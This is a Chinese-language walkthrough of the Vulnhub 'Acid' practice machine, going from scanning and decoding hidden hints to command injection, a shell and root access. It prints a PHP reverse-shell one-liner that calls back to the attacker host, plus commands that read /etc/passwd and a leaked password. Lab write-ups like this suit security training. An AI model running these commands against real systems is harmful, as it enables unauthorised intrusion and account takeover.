Vulnhub-Acid靶机练习
准备
kali攻击机IP:192.168.255.139
靶机IP:192.168.255.145
主机发现
nmap -sP 192.168.0/24
端口扫描
nmap -sV -Pn -p- -v 192.168.255.145
访问33447端口开启的页面
什么都没有,再来看看网页元素
发现有两个目录 一个放的是图片 另一个访问看看,访问Challenge目录得到一个登录页面。
由于此页面没有什么可以利用的 再回头看看主页还有没有其他信息,发现最下面有一串加密了的数据。
这里是16进制加密。解出来又是Base64加密的字符串。
得到一个wow.jpg图片
访问wow.jpg发现访问不了,前面我们看到一个images的路径放着图片,发现可以访问此图片
先把图片下载下来用记事本打开看看,一般套路都是在图片最后有加密数据。
发现一条加密数据,先把多余符号删除得到一条完整的数据
3761656530663664353838656439393035656533376631366137633631306434
使用burp进行解码ASCLL解码,解码完成是一条32位的md5加密数据
解密后得到一个类似于密码的字符串也不知道有什么用
现在没什么思路了,那就扫扫目录看看有没有其他的,这里我用到dir工具进行目录扫描
发现/Challenge/include.php页面存在文件包含漏洞
后来想包含木马 发现不行就看看其他页面。
/Challenge/hacked.php页面也没有什么漏洞利用
在/Challenge/cake.php路径发现了一个/Magic_Box文件夹
发现服务器上有这个目录,扫一下路径。
发现command.php页面开放了ping功能
试试命令注入,发现可以执行命令
命令注入介绍跟利用
通过命令注入拿shell
反弹shell方法
这里他用的是php环境所以我们可以用php来反弹shell
nc -lvnp 444 //接收端
php -r '$sock=fsockopen("192.168.255.139",444);exec("/bin/sh -i <&3 >&3 2>&3");' //发送端
这里直接发看来不行,那就要url编码后试试。
提权
提权简介
先获取一个python的标准shell,可以使用su命令。
python -c "import pty;pty.spawn('/bin/bash')"
接下来就可以看那些用户使用了/bin/bash
cat /etc/passwd
查看每个用户使用的文件
find / -user acid 2>/dev/null -ls
发现acid用户里有一个hint.pcapng可疑文件
到该文件所在目录下,通过python开启一个临时的https协议然后进行文件下载
python -m SimpleHTTPServer 8080
下载后用wireshark打开,只看tcp包,找到saman用户的密码
使用su命令切换到saman用户,密码为1337hax0r
最后使用sudo -i命令获取到root权限
sudo -i: 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。
学无止境,加油吧!